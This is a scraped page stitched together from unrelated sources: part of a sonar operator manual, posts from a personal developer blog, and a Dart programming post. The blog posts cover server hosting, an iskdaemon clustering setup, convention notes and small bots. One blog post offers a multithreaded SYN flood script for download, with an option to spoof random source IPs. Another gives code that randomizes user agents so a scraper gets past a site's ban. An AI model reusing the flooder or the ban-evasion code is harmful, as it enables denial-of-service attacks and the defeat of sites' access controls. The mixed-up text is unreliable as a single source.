19 OPERATOR SWITCHES AND CONTROLS (continued) View: The number of toolbars available under VIEW depends on the display resolution selected for the monitor. The higher resolution settings permit a single large toolbar (Mode/Screen Toolbar), where a lower resolution setting (640 by 480) requires three toolbars (Standard/Playback/Screen Position) to show the same number of icons. Details for each of these toolbars is covered later in the manual. Mode/Screen Toolbar - Displays icons for various tools on left side of screen. Playback Slider bar - Active in Playback mode. Allows the operator to control the playback speed of recorded files. The speed can be adjusted from very slow to very fast. File Position Toolbar - Used when Playback is selected. Displays the approximate location in the file for the present image being displayed. Operator can instantly move anywhere in the file by moving the slider. Screen Position - Moves the origin of the sweep display giving the operator a larger viewing area. Center, Left, Right, Top, Bottom can be selected. Show Range Rings - Makes the range rings visible in the sector the sonar is sweeping. This can assist the operator in determining the distance to a target. The default command is not to show the range rings. Display GPS - The GPS position is shown in the BOAT LOCA- TION section of the Righthand Toolbar. Settings Toolbar - Show or hide the right hand settings toolbar Actions: The commands shown under the ACTION pulldown menu duplicate many of the commands shown on the Playback and Mode/ Screen Toolbars. Record - Selecting this command operates the sonar and saves the data to a file. Monitor Mode - This command is for real time viewing of sonar images without recording data. Playback - Used to playback a previously recorded file. Playback with Continuous Loop - Continuously repeats the playback of a recorded file. Rewind - Rewind a recorded file. Fast Forward - Views the recorded file in fast motion. 
Stop - Stops the recording or playing back of a file. Record Highlights - Records select parts (edits) of a previously recorded sonar record to a 19
20 OPERATOR SWITCHES AND CONTROLS (continued) separate file (see page 24 for details). Settings: Set Serial Port number - The Sonar Processor has an integrated USB to Serial communications port. The operator must select the Sonar Processor com port for proper operation. Note: Use the same physical USB port on the PC every time. Set Head Orientation - The choices are normal or inverted. The sonar operator must identify whether the scanning head is mounted right side up (normal) as would be if mounted on top of a ROV, or upside down (inverted) as if it was pole mounted and deployed over the side of a boat. If the orientation is set incorrectly, targets that should be displayed on the left side of the screen will be displayed on the right side. Set Date Format - The operator can choose either: month/ day/ year or day/month/year. The date is displayed in the Settings Toolbar. Set Time Format - The operator can choose either a 12 hour or 24 hour time format. The time is displayed in the Settings Toolbar. Restore Default Settings - Returns settings to the original factory default settings. Help: Help Topics - Refers you to Operators Manual for help. Company contact information is provided. About Sonar - Revision information and Company contact information is provide 20
21 OPERATOR SWITCHES AND CONTROLS (continued) TOOL BARS: Mode/Screen Toolbar- The Mode/Screen toolbar allows for easy 1-click access to many software functions. A Tooltip stating the name of a button will appear when the mouse cursor hovers over the button. These controls are duplicates of Menu functions, please refer to the Software Menus section of this manual starting on page 19 for a detailed explanation of the commands below. - Removes tool bar from screen. - Record new file. - Monitor Mode, only real time viewing of the sonar image with no recording of data. - Playback - Fast forward - Rewind - Rewind to beginning of file. - Stop playing file, - Open a file for playback, - Save screen as Bitmap picture. - Clear the screen. - Print creen. - Center of the screen. - Top center of the screen. - Down center of the screen. - Left center of the screen. - Right center of the screen. - Upper left corner - Upper right - Lower left corner - Lower right corner - Zooms in on sonar image. These Screen Position commands move the center of the scanned area to best match the display to the sector being scanned. File Position Toolbar - Used when Playback is selected. Displays the approximate location in the file for the present image being displayed. Operator can instantly move anywhere in the file by moving the slider. 21
22 OPERATOR SWITCHES AND CONTROLS (continued) TOOL BARS: (CONTINUED) Playback Slider bar - Active in Playback mode. Allows the operator to control the playback speed of recorded files. The speed can be adjusted from very slow to very fast. Sweep speed bar - Only needed if your SCAN-650 Sonar Processor connects to your PC using a PC-CARD. If your Sonar Processor connects to your PC using a USB port, the Sweep Speed Bar is not used [speed adjustment is automatic]. Active in Recording and Monitor mode. Allows the operator to optimize sweep speed to match the speed of the computer. To set the optimum speed, move the slider toward FAST until the data is only shown in half of the screen sector ( a mirror image is shown in each half of the chosen sector). Now move the slider slightly toward SLOW until data is shown in the full chosen sector. Note: Slider adjustments only take effect the beginning of the next sweep. Note: The sweep speed must be optimized for each combination of Range and Step. The software will save the user optimized setting for each combination. 22
23 OPERATOR SWITCHES AND CONTROLS (continued) TOOLBARS: (CONTINUED) Settings Toolbar Displayed on the right side of the screen. Information and pull down menus are: - Range - The range setting sets the radius of area to be scanned. Range settings of: 5, 10, 20, 40, or 60 meters are available. A 360 sweep with a range setting of 10 meters would result in a total scan diameter of 20 meters. - Steps -The steps setting sets the number of degrees the transducer rotates between the individual pings of a sweep. The smaller the step, the higher the image resolution. Larger steps reduce the time it takes to scan a sector, but trade image quality. Step degrees of 1/2, 1.0, 1.5, or 2.0 degrees are available. - Start of Sweep, End of Sweep - Allows the user to select the sector that will be scanned. The angle can be selected from the pulldown menus or can be typed into the box. Please refer to page 25 for more details. - Sector - When depressed, the sweep rotates between the Start of Sweep angle and the End of Sweep angle. Scans perfomed using the Sector setting will start in a clockwise direction and reverse direction at the end of each sweep SCAN - When depressed the sweep rotates continuously (360 deg), always clockwise. - Zoom - Sets the magnification of the displayed image. Available Zoom settings are: 50%, 100%. 150%, and 200%. 100% is normal. The Zoom setting can also be changed by pressing the + and - keys on the keyboard. - Color Bar - Displays the colors for the sonar image being displayed. Zero or weak echo returns are represented by the colors on the left side of the bar and strong returns are the colors on the right side of the color bar. - Color - Selects the colors for the color bar. There are numerous color choices. The color combinations allow the sonar image to be displayed in various shades of both colors. The best color is a matter of operator preference although at times a sonar image can appear to be more distinct in one particular color. 
Clicking repeatedly on the COLOR button scrolls through the color choices, or the color can be selected by clicking on the down arrow on the right hand side of the box showing the color name. - Invert Color - Clicking the invert color button inverts the color bar. The colors on the left are now on the right and the colors on the right are now on the left. At times a sonar image can appear to be more distinct by vewing it in an inverted color set. - Gain - The software gain control should be used only during playback to compensate for images recorded with improper TVG control settings. The gain can be adjusted from -5 to +5 in one digit increments. Clicking repeatedly on the GAIN button scrolls through the 11 gain settings. The gain can also be set by clicking on the down arrow on the right hand side of the box showing the gain number. Positive numbers increase the gain, negative numbers decrease the gain. The Gain should be set to 0 during recording. 23
September 17, 2014 at 06:13 AM
Studio Bebop has been growing a lot over the last year. We're now incorporated, and last week moved all of our server equipment into our very own (colocation) data center!
Before I get into the big data center move, I first have to rewind back to early 2013 and my first foray into hosting my own servers. At the time I was developing a price comparison website (like Expedia or Kayak) for PVC figures from anime and video games, called Figure Stalk (which is still under development FYI).
The core component of what makes Figure Stalk run is an image matching engine that compares images of potential product matches on other vendor websites with the images on a source product page you'd feed into the website. (If you'd like to know more about the image matching engine stuff, you should take a peek at this blog post I wrote about it.) The only problem is that the image matching engine requires a fairly large amount of RAM to play with in order to be fast enough to be more than a proof of concept, and at the time all of Studio Bebop's hosting needs were being facilitated with VPS servers from Linode, who while great for what they do, weren't really equipped to meet our needs for this project (at least without costing me an arm and a leg).
So after crunching the numbers, I decided to throw caution to the wind and bought the components for a manly man server with RAM for days. Two weeks, a couple orders for missing components, and a loving kernel configuration later, Bebop3 was born! In the interest of brevity I won't bore you with all the hardware details; suffice it to say that Bebop3 ended up having 96 GB of RAM, 2x 2.0 GHz 8-core CPUs, an SSD for the OS and DB, and a 1 TB WD Red for holding all the static content.
Armed with my new super server, I was then faced with the task of finding a nice fat pipe and a static IP to hook it up to, somewhere close enough to where I lived in case I needed to perform maintenance, but far enough away that my apartment didn't end up looking like an episode of Serial Experiments Lain. At the time I was unaware that colocation was even a thing, so I ended up signing a three year agreement for business class internet with Comcast. The package I was able to get with them was 1 static IP, 20 Mb/s up, and 50 Mb/s down for $225 a month, and while not ideal, it at least got the job done and was the best option I had available to me at the time.
Or rather I should say, it got the job done until a month or so later when I launched Yugioh Prices, which in turn took off like a rocket and quickly maxed out my measly 20 Mb/s up speed. As time went on and Yugioh Prices continued to grow in popularity, I worked around my bandwidth limitations with Comcast by hosting the Yugioh card images that were eating up all of my bandwidth on 4 separate Linodes, and using a round-robin load balancing strategy to split the load across the four. (Because even though Linode had the bandwidth to serve the images without a problem, they limited me to 4 TB a month of outgoing data per VPS, and on a heavy month we'd push out at least 12 to 13 TB in Yugioh card images.)
This set up would have been ideal if Yugioh Prices and Figure Stalk were the only things that Bebop3 was hosting, but after about a year the machine had become the primary back-end workhorse for Studio Bebop and was hosting 18 different websites and support APIs for our various products, and after seeing top stats like these as the norm last month, I knew it was time once again to invest in more server hardware. This investment took the form of Bebop6, a clone of Bebop3, but with much scarier fans.
With Bebop6 in tow, I gave Comcast the boot (well, more like just unplugged everything and agreed to keep paying them, because they've got me locked in a contract for another 18 months :/), and signed up with Fibernet here in Orem. I cannot overstate how impressed with Fibernet I am, and how excited I am to have my servers housed in their data center. After hacking around with trying to do it myself with a mobile rackmount tank at my aunt and uncle's house in Spanish Fork, it is a huge relief to finally be in a real data center!
I've signed up for Fibernet's full cabinet bundle, which gets me:
Phew, well that's enough background on why I ended up moving my server hardware into a data center, so how about some pictures already!
Oh, and just in case you're wondering why the left fan on Bebop3 isn't spinning, it's because I accidentally got a little too close to it while it was running, and it ended up sucking one of the cuff buttons right off of my jacket, which it then proceeded to snap two of its blades off on. Now that's the kind of excessive cooling power every server should have, grunt grunt.
March 13, 2013 at 12:00 PM
imgSeek (and its server-side variant iskdaemon) is an open source image matching engine developed by Ricardo Cabral. In a nutshell, imgSeek makes it possible (with just a little bit of hacking) to perform reverse image searches and visual similarity comparisons against a specific group of images of your choice, just like Google Images or TinEye (but without the beefy monthly fees). For more information, take a look at the official imgSeek documentation.
For those of you who may not see the value in being able to do reverse image searches and visual similarity comparisons on an arbitrary set of images, allow me to elaborate with a real-world example of how I use imgSeek.
Ever since mid-November I've been using imgSeek to handle all of the server-side logic behind the "identify a card by taking a picture of it" feature of my iOS app Duel Master: Yu-Gi-Oh Edition. With this feature all a user has to do is take a picture of a Yu-Gi-Oh card, and within seconds all of the relevant information about that particular card (details, rulings, prices, etc) will be presented to them. This is all accomplished by uploading the picture they took to one of the Studio Bebop API servers, feeding it through imgSeek, and then returning the results to the app for additional processing and presentation. You can see a demonstration of this feature in action in the promo video below.
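For the curious, the server-side round trip behind that feature is pretty small. Here's a minimal sketch of it. Note that this is a hypothetical reconstruction: the port (31128), the /RPC endpoint path, and the exact queryImgBlob signature are assumptions based on iskdaemon's API naming, so check them against your own build before trusting them.

import xmlrpc.client

DB_ID = 1  # which iskdaemon image database to search against

def query_card_image(jpeg_bytes, host="localhost", port=31128, num_results=3):
    """Send the uploaded photo to iskdaemon and return its raw matches."""
    # Port and endpoint path are assumptions, not guaranteed defaults
    server = xmlrpc.client.ServerProxy("http://%s:%d/RPC" % (host, port))
    return server.queryImgBlob(DB_ID, xmlrpc.client.Binary(jpeg_bytes),
                               num_results)

def best_match(results, min_score=0.5):
    """Pick the top-scoring [image_id, score] pair, or None if too weak."""
    if not results:
        return None
    image_id, score = max(results, key=lambda pair: pair[1])
    return image_id if score >= min_score else None

The app then takes the winning image_id, looks up the matching card's details and prices, and ships them back down to the phone.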
As you can see, imgSeek definitely works, and it works pretty well too. However don't let my super awesome app promo fool you, there are some serious drawbacks and kinks to using imgSeek. Despite the fact that imgSeek is technically stable enough to be deployed for real-world projects, the truth is that it is still in-development software, and as such suffers from bugs, hiccups, and scary segmentation faults.
Moreover, imgSeek doesn't scale very well, especially when it comes to handling lots of requests at once. While there is some vague mention of a "clustered mode" within the default iskdaemon configuration file, it isn't actually an implemented feature yet. As such, if you hit a stock copy of iskdaemon with lots of requests at a time, you're going to start to see some serious lag due to the fact that at the moment a stock copy of iskdaemon can only process one request at a time. So if it takes roughly one second for your copy of iskdaemon to perform a visual similarity comparison, and you've got twenty or thirty requests in the queue, you can expect some serious latency. (Which will only grow worse as you add more images to your database.)
Luckily for all of you, I've taken it upon myself to implement fixes for all of these gripes (and a few more I didn't bother mentioning), and put them into a special branch of iskdaemon called iskdaemon-clustered!
Clustered Access Layout
The basic theory behind clustering instances of iskdaemon is pretty straightforward. First you launch multiple instances of iskdaemon, each listening on a different port, but all sharing the same image database file. Then, you use Nginx (or whatever HTTP daemon floats your boat), to handle the actual load balancing via a round robin style proxy pass. Simple right? WRONG! Well sort of...
The above layout will work fine as long as you're just performing read requests (queryImgID, queryImgBlob, queryImgPath), but once you start doing write requests (addImgBlob, addImg) through the load balancing proxy pass, that's when things start to break. To put it simply, your instance nodes will start to develop database inconsistencies with each other. By which I mean that some nodes will have an image, while others won't. Moreover, once you start trying to save/load to the same database file things get even worse, because that's when you'll start to see endless loops of database errors and/or crashes.
To overcome this shortcoming, I decided to tweak things so that there is a separate instance of iskdaemon running outside of the proxy pass group, that is specifically dedicated to performing write requests. Then with the addition of some fancy h4x, I made it so that the reader iskdaemon instances in the proxy pass group automatically update their local copies of the image database so that they are always up to date.
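From the client's point of view the split is simple: read calls go through the Nginx proxy, and write calls go straight to the writer. Here's a minimal routing sketch, assuming the proxy listens on port 81 as in the Nginx config later in this post; the writer port (1336) is purely illustrative, so substitute whatever port you actually bind the writer to.

# Method names come straight from iskdaemon's API
READ_METHODS = {"queryImgID", "queryImgBlob", "queryImgPath"}
WRITE_METHODS = {"addImg", "addImgBlob", "saveDb"}

PROXY_URL = "http://localhost:81/"     # Nginx round-robins over the readers
WRITER_URL = "http://localhost:1336/"  # the dedicated writer instance (assumed port)

def endpoint_for(method):
    """Route a call to the reader pool or the writer instance."""
    if method in READ_METHODS:
        return PROXY_URL
    if method in WRITE_METHODS:
        return WRITER_URL
    raise ValueError("unknown iskdaemon method: %s" % method)

As long as every write goes through the single writer, the readers never have to fight over the database file.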
Implementing the separate writer instance was pretty straightforward, but the logic behind keeping all of the reader instances up to date is a bit more complicated. In this next section I'll be going over in detail how I do that. You don't have to read the next section to compile/install iskdaemon-clustered, but you probably should. If you don't feel like it, skip ahead to Installing iskdaemon-clustered On Your Server.
Overcoming Database Inconsistencies With Multiple Iskdaemon Instances
Clustered access layout with separate writer instance.
The reason that parallel iskdaemon instances can develop database inconsistencies in the first place lies in the fact that iskdaemon reads and writes its image data to a single database file that is only read into memory when the iskdaemon process first starts. Any image data you add via addImgBlob or addImg is held only in memory until you call saveDb.
So when you add an image to your images database using one of your parallel instances of iskdaemon, the other instances won't know about it until they reread the database file, which normally only happens when you start iskdaemon. To overcome this hurdle I've modified queryImgBlob and queryImgID so that they call a special function that checks to see if the images database has been modified since the last time there was a read request, and rereads it into memory if there have been any changes, before doing any actual image matching work.
Unfortunately rereading the database file into memory is trickier than you might think. If for instance you try to reread the database file while your writer process is in the middle of saving its new changes, you'll more than likely run into a fat load of read errors that could potentially send your reader instances into an infinite loop of database errors. To work around this issue, I implemented another special function that copies the main images database file into a temporary file, which is read, and then deleted. If the read fails for some reason, the function recurses into itself until it successfully rereads the image database file. I'll be the first to admit that it's not the most elegant of solutions, but it's simple, and it works.
Below is a flow chart that outlines the process iskdaemon-clustered uses to handle read requests without running into database inconsistencies.
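In code, that read-path check looks something like the following. This is a hypothetical reconstruction of the two helpers, not the actual patch: the real database-loading routine lives inside iskdaemon, so it's stubbed out here as a load_db callable you pass in.

import os
import shutil
import tempfile

_last_mtime = 0.0  # mtime of the db file the last time we read it

def safe_read_db(db_path, load_db):
    """Copy the shared db to a temp file, load that copy, then delete it.

    If the copy or load fails (e.g. the writer is mid-save), recurse and
    try again, mirroring the original "retry until it works" design."""
    fd, tmp_path = tempfile.mkstemp(suffix=".isk")
    os.close(fd)
    try:
        shutil.copyfile(db_path, tmp_path)
        return load_db(tmp_path)
    except (IOError, OSError):
        return safe_read_db(db_path, load_db)
    finally:
        if os.path.exists(tmp_path):
            os.remove(tmp_path)

def reread_if_changed(db_path, load_db):
    """Reload the image database only if it changed since the last read."""
    global _last_mtime
    mtime = os.path.getmtime(db_path)
    if mtime > _last_mtime:
        _last_mtime = mtime
        return safe_read_db(db_path, load_db)
    return None  # the in-memory copy is already current

Each reader calls reread_if_changed at the top of queryImgBlob/queryImgID, so the mtime check is the only cost on the common path where nothing has changed.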
Installing iskdaemon-clustered On Your Server
Please note that the following instructions are for compiling/installing on a *nix system. You're on your own Windows users.
First up, make sure you have all of the necessary prerequisites. (If you are using Gentoo, you should be able to emerge all of this stuff without any problems.)
Next, clone the iskdaemon-clustered Github repository.
git clone
Now compile iskdaemon-clustered!
$ cd iskdaemon-clustered
$ cd src
$ python setup.py build
$ sudo python setup.py install
Now assuming that you have all of the necessary prerequisites, and nothing went wrong, iskdaemon-clustered should now be installed on your system. If you are having problems compiling, try taking a look at the installation instructions on the imgSeek website.
Now for the fun part, configuring your iskdaemon cluster! As I explained earlier, the basic concept here is to launch multiple instances of iskdaemon.py in parallel that all share the same database file. To make this easier for you, I've included a python script (launch-clustered-isk.py) that makes this super easy (again it's a little hacky, but it gets the job done without too much work).
First copy launch-clustered-isk.py to wherever you'd like to hold the database and other files for your iskdaemon cluster. (I just use my home directory.)
cp iskdaemon-clustered/launch-clustered-isk.py ~
launch-clustered-isk.py should work right out of the box, but for the sake of learning, let's take a quick peek at its configuration options.
Open launch-clustered-isk.py up in your favorite text editor (Nano master race reporting in). Lines 19-23 are the places where you can make adjustments where you need/want to, each line is commented, but I'll give you a quick overview anyway.
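Conceptually, the launcher boils down to something like this. To be clear, this is a hypothetical sketch rather than the script's actual code, and the -port and -dbfile flag names are made up for illustration:

import subprocess

def build_commands(db_path, base_port=1337, readers=12):
    """Return the argv for the writer plus each reader instance.

    Every instance gets its own port but shares one database file."""
    cmds = []
    # one writer, parked on the port just below the reader range
    cmds.append(["iskdaemon.py", "-port", str(base_port - 1),
                 "-dbfile", db_path])
    for i in range(readers):
        cmds.append(["iskdaemon.py", "-port", str(base_port + i),
                     "-dbfile", db_path])
    return cmds

def launch(db_path):
    """Spawn the whole cluster and return the process handles."""
    return [subprocess.Popen(cmd) for cmd in build_commands(db_path)]

With the defaults above, the reader ports (1337-1348) line up with the Nginx upstream block shown below.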
Once you have launch-clustered-isk.py configured just the way you want it, it's time to configure Nginx to handle proxying requests to your cluster.
Open up Nginx's config file (should be /etc/nginx/nginx.conf on Gentoo) in your favorite text editor, and in the http{} section, add the following lines.
http {
    upstream isk-cluster {
        server localhost:1337;
        server localhost:1338;
        server localhost:1339;
        # ... skipping some lines, and assuming you configured 12 reader instances
        server localhost:1346;
        server localhost:1347;
        server localhost:1348;
    }

    # listen on localhost on port 81
    server {
        listen 81;
        server_name localhost;
        location / {
            proxy_pass http://isk-cluster;
        }
    }
}
Now (re)start Nginx, and then run launch-clustered-isk.py. If everything went right, you should see a bunch of lines about launching iskdaemon instances and listening on different ports. If you see error messages, something has gone terribly terribly wrong, and it's up to you to figure out what.
Assuming everything went as planned, you should now be able to access your iskdaemon read cluster through the Nginx proxy on port 81, and your writer instance directly on its own port. Have fun!
Miscellaneous Tips and Information
$ screen
$ ./launch-clustered-isk.py &
$ killall launch-clustered-isk.py
$ killall iskdaemon.py
$ echo renice -n -10 -p `echo \`pgrep iskdaemon.py\` | sed -e 's/ / /g'` | sudo /bin/bash
I use iskdaemon-clustered in the following projects.
If you have an idea to improve iskdaemon-clustered, or are using it in a project, let me know!
January 18, 2013 at 12:00 PM
I wrote this script a long time ago when I was just starting to learn about networking basics. During that time, I came across a Python library that makes it easy to craft and manipulate network traffic at a packet level by the name of Scapy.
I wrote this script as a demonstration of a SYN/ACK Three Way Handshake Attack as discussed by Halla of Information Leak in an article that has since mysteriously disappeared from his site. I also mentioned this script in an article I wrote about hacking gibsons or something to that effect, which I have since removed from this site because the writing in it was atrocious. (Well, it was written by a ninth grader, so that's not a huge surprise.)
Anyway, aside from searches for the phrase "How can you say you love her if you can't even eat her poop?" (oh yeah, I'm an SEO master), the majority of external search engine hits to my website come from people looking for this script. Therefore, I decided I'd spruce it up a touch, and repost it in all of its glory here.
So without further ado, gaze and behold!
#!/usr/bin/env python
#########################################
#
# SYNflood.py - A multithreaded SYN Flooder
# By Brandon Smith
# brandon.smith@studiobebop.net
#
# This script is a demonstration of a SYN/ACK 3 Way Handshake Attack
# as discussed by Halla of Information Leak
#
#########################################

import socket
import random
import sys
import threading
#import scapy # Uncomment this if you're planning to use Scapy

###
# Global Config
###
interface = None
target = None
port = None
thread_limit = 200
total = 0
#!# End Global Config #!#

class sendSYN(threading.Thread):
    global target, port

    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # There are two different ways you can go about pulling this off.
        # You can either:
        # - 1. Just open a socket to your target on any old port
        # - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
        #
        # (Uncomment whichever method you'd like to use)

        # Method 1 -
        # s = socket.socket()
        # s.connect((target, port))

        # Method 2 -
        # i = scapy.IP()
        # i.src = "%i.%i.%i.%i" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))
        # i.dst = target
        # t = scapy.TCP()
        # t.sport = random.randint(1,65535)
        # t.dport = port
        # t.flags = 'S'
        # scapy.send(i/t, verbose=0)

if __name__ == "__main__":
    # Make sure we have all the arguments we need
    if len(sys.argv) != 4:
        print "Usage: %s <Interface> <Target IP> <Port>" % sys.argv[0]
        exit()

    # Prepare our variables
    interface = sys.argv[1]
    target = sys.argv[2]
    port = int(sys.argv[3])
    # scapy.conf.iface = interface # Uncomment this if you're going to use Scapy

    # Hop to it!
    print "Flooding %s:%i with SYN packets." % (target, port)
    while True:
        if threading.activeCount() < thread_limit:
            sendSYN().start()
            total += 1
            sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)
Download: SYNFlood.py
January 3, 2013 at 12:00 PM
I went to Ikkicon last weekend with my younger brother and a few of my friends, and it was a lot more fun than it was last year. I spent a lot of money, I learned a great many things, and had a wonderful time.
Here are the highlights.
If you're going to buy one thing, you might as well buy six!
Some of you may be familiar with "The Slippery Slope", i.e. the practice of buying figures and other such merchandise from various anime, manga, and video games. Well I've been riding down that particular incline for a few years now, and as I get older and make more money, my collection only grows more and more powerful.
Anyway, I thought that I had bought a lot of figures this year at San-Japan, but my haul from Ikkicon this year (pictured on the right) blew that collection out of the water! Here's a quick breakdown of what I bought.
Now while this haul from Ikkicon is pretty darn awesome (though it would have been better if I could have found an Elsie figure), I'm faced with a serious problem: I don't have anywhere to put these new figures! My current shelf situation has just about reached critical mass, but I have a plan!
When I get back to my apartment on Friday, I'm going to bust out some serious feng shui on my room. What I want to do is get two or three of these DETOLF glass display cabinets from IKEA, and then rig up some cool LED lighting in them as outlined by this article. I've seen examples of other people's collections who have taken this approach, and it looks pretty awesome. I've got the skills and cash necessary to execute a project like this, now I just need to figure out how to fit it all in to my room, and still be able to sleep.
That boy aint right.
This one came way out of nowhere. The guy who played the voice of John Redcorn from King of the Hill was at Ikkicon. He was signing autographs and selling John Redcorn chips. I bought a bag, and got him to say a few lines from the show. It was a cool experience, but it's also such an odd thing to see at an anime convention that you just gotta laugh.
The Game Room
One thing that has always been way hit or miss for me at cons, is the game room. This year Ikkicon's game room was pretty meh. They had a few consoles and you could pick a few games to play which was nice, but the TVs were way too small, and Melee was straight up banned. There was a little Rock Band station set up, but that's kinda hard to get into when you can barely hear the music. There was also a rigged up Stepmania (DDR for PC) game, and that was it.
I wish Ikkicon would do what they did a few years ago, and have 20 or so PCs setup on a LAN, and just have everyone play Unreal Tournament and Call of Duty. That was waaaaaay more fun. It wasn't that the game room was terrible or anything, it just wasn't very good.
If I were in charge of setting up the ideal game room for a con, here's what I'd have.
Dubs in my VN? It's more likely than you think.
We went to a panel on Saturday about dubbing visual novels. This was a subject that had us scratching our heads, as we had never heard of anything like this before. Well apparently it's a thing, albeit a pretty small one. The panel itself was more focused on how to not suck at being a professional voice over talent, and was very interesting.
I'm pretty sure the panel was being ran by the people from Sake Visual, and we were able to learn all about non-Japanese visual novels, and about the English VN dubbing scene. I ended up buying some stuff from them later that day after the panel (pictured left).
The game at the top in the picture is Koenchu, and it's the only one that I've played so far. I started out playing it with the English dub on, but I didn't like it. To be fair, it's a game about being in a school for becoming a voice actor in Japan, so it would be pretty hard to make a dub that would be able to really capture the essence of moe moe Japanese seiyuu.
The bottom two games are a series of detective games that was developed here in the US by Sake Visual. I'm excited to play these two. They were described to me as being kind of like Phoenix Wright mixed with Higurashi, which sounds like a pretty sweet combo. From what I've seen from the art shown off by the about page on the Sake Visual website, the art looks like it'll be pretty good. I just hope that the dub is decent too.
Nerdcore Comedy
Ikkicon had a nerdcore comedy show this year, and it was pretty good. We were late and missed the first act, but the second guy was pretty good, and he totally made fun of these super saiyan level loud dudes that were sitting right behind us. The final act was Alex "KOOLAID" Ansel, and he was great. My brother and I saw him at San-Japan earlier this year, and he was even better this time at Ikkicon. He performed for a long time, told some jokes I hadn't heard from him before, and was all around awesome. I even picked up a copy of his bootleg.
The End.
January 3, 2013 at 12:00 PM
== Source code available on my Github. ==
A friend of mine asked me to write him a bot that would automatically poke back anyone who poked him on Facebook, so that's what I did.
This bot doesn't make use of any of the actual Facebook APIs, but instead performs all of its actions by mimicking the behavior of an actual web browser. I designed it this way for three reasons.
Requirements
Usage
Assuming you meet all the requirements listed above, all you need to do is run main.py Pokebot will ask for your Facebook email and password, as well as an amount of time to wait between checking for pokes. Once all of that information is squared away, Pokebot will run on a continuous loop until you tell it to stop.
== Source code available on my Github. ==
October 24, 2012 at 12:00 PM
Granted I'm slowpoking super hard on this, but holy crap!
There is an article over on ZDNet about heuristic password cracking that is pretty much based entirely on my article "Building the Better Brute Force Algorithm", which was published in 2600: The Hacker Quarterly last July!
Not only that, but it uses direct quotes from my article, as well as paraphrasing, and even mentions my name!
That's so awesome!
October 24, 2012 at 12:00 PM
I put together a scraping bot for a website I frequent occasionally, but they got wise to my Python shenanigans after I released the source code (who'd have thought?), so I had to step up my bot code a bit.
After some tinkering I found that they had just blacklisted the user agent header I was using for the script, instead of doing something more effective like setting access timers between page requests, or getting strict on referer headers, or just banning my account.
But I digress...
Since all they did was ban the user agent string I was using before, all I had to do was change it , and I was back in business. But in the long run this isn't really the best solution since they could always just ban the user agent header again. So instead I decided to throw together a quick Python function that generates a randomized, realish looking user agent header.
Gaze and behold!
def get_random_useragent(): base_agent = "Mozilla/%.1f (Windows; U; Windows NT 5.1; en-US; rv:%.1f.%.1f) Gecko/%d0%d Firefox/%.1f.%.1f" return base_agent % ((random.random() + 5), (random.random() + random.randint(1, 8)), random.random(), random.randint(2000, 2100), random.randint(92215, 99999), (random.random() + random.randint(3, 9)), random.random()) >>> print get_random_useragent() Mozilla/5.2 (Windows; U; Windows NT 5.1; en-US; rv:2.5.0.5) Gecko/2009098692 Firefox/3.3.0.4 >>> print get_random_useragent() Mozilla/5.5 (Windows; U; Windows NT 5.1; en-US; rv:3.3.0.7) Gecko/2006095233 Firefox/3.2.0.2 >>> print get_random_useragent() Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1.0.4) Gecko/2064093484 Firefox/4.4.0.8 >>> print get_random_useragent() Mozilla/5.6 (Windows; U; Windows NT 5.1; en-US; rv:7.5.0.6) Gecko/2063099117 Firefox/3.6.0.6
I hope someone out there besides me can find a use for this.
Download: random_useragent.py
J!
March 21, 2012 at 12:00 PM
Ever since I started developing the iManga Reader app back in 2009, I've had the chance to read a lot of different manga. So, listed below in no particular order are five manga that I recommend you check out.
March 6, 2012 at 12:00 PM
Just bought this today, suuuuper stoked to play it. I will say this though, I am not very happy that EA has chosen to hold my game hostage until I install their Steam rip-off, and register an account with them.
At least they aren't making me install Gamespy or Banzai Buddy :/
IP hostage negotiations aside, it's time to go save the universe, and make this happen. | http://teh-1337.studiobebop.net/ | CC-MAIN-2019-13 | refinedweb | 4,791 | 69.62 |
I kinda like Dart mirrors.
As a long time dynamic language programmer, I didn't think that I would, but it can be quite pleasant. Other times, however...
In the code from last night's video, the
call()method in the
SimpleCommandclass is nice:
import 'dart:mirrors'; class SimpleCommand<T> implements Command { T receiver; Symbol action; List args=[]; SimpleCommand(this.receiver, this.action, [this.args]); void call() { reflect(receiver).invoke(action, this.args); } }This reflects on the object, then invokes a method with arguments. What could be easier or cleaner?
What I do not like is what I did with the
Historyclass, which holds a list of undoable commands in an application. The guard clause at the beginning of the
add()method is too long and obtuse:
class History { // ... static void add(Function c) { if (!reflect(c).type.instanceMembers.containsKey(#undo)) return; _h._undoCommands.add(c); } // ... }What that line does is return when the command does not support an
undo()method. That is, commands that cannot undo should not be added to this history list. It works, but...
I cannot work directly with the object mirror—there is no way for the object mirror in Dart to reflect on its methods or properties. So instead, I have to get a class mirror from the object mirror's
typeproperty. Then, I get a map of the supported methods with
instanceMembers. Finally, I can ask if the list of instance members (methods) includes the
undo()by asking if the map contains the
#undosymbol. But I do not want to know if it contains the key—I want to know if it does not contain the key—so I have to go all the way back to the beginning of the expression to negate it.
I might simplify slightly by breaking parts out into helper methods or switching from a returning, negated guard clause to a curly-brace enclosing expression. Neither of those options really helps cut through the dense, hard-to-read code. I breezed through this implementation last night in the hopes that something better would appear today. Sadly, I cannot find anything in Dart mirrors that can make this any better.
I could switch my undoable command classes to support a different interface—
UndoableCommandinstead of
Command:
abstract class Command implements Function { void call(); } abstract class UndoableCommand implements Command { void call(); void undo(); }Then commands that support undo, like move-north, can implement this new interface:
class MoveNorthCommand implements UndoableCommand { Robot robot; MoveNorthCommand(this.robot); void call() { robot.move(Direction.NORTH); } void undo() { robot.move(Direction.SOUTH); } }Making use of that, my guard clause is much clearer:
class History { // ... static void add(Function c) { if (c is! UndoableCommand) return; _h._undoCommands.add(c); } // ... }That is much clearer than my mirror based approach. But I hate it.
It seems crazy to declare a class whose sole purpose is to describe that it supports a single method. Why not just ask it if it supports the method?
In the end, it is a good thing I punted this question until today. I finished the video and this certainly would have side-tracked me. I remain unsure what I would do if presented with this in live code. From a code maintainability perspective, I prefer the mirror approach (I'd likely put the obtuse path to the answer into a helper method). From a performance perspective, I would likely favor the subclass-just-to-support-one-method approach, avoiding mirrors. So it depends.
And last night's quick and dirty solution just might end up being my real solution in many instances.
Maybe you can come up with a better approach on DartPad!
Day #44
I poked around with the code a bit here
The main changes I made are
- Command is a typedef. Function is too broad IMO for this
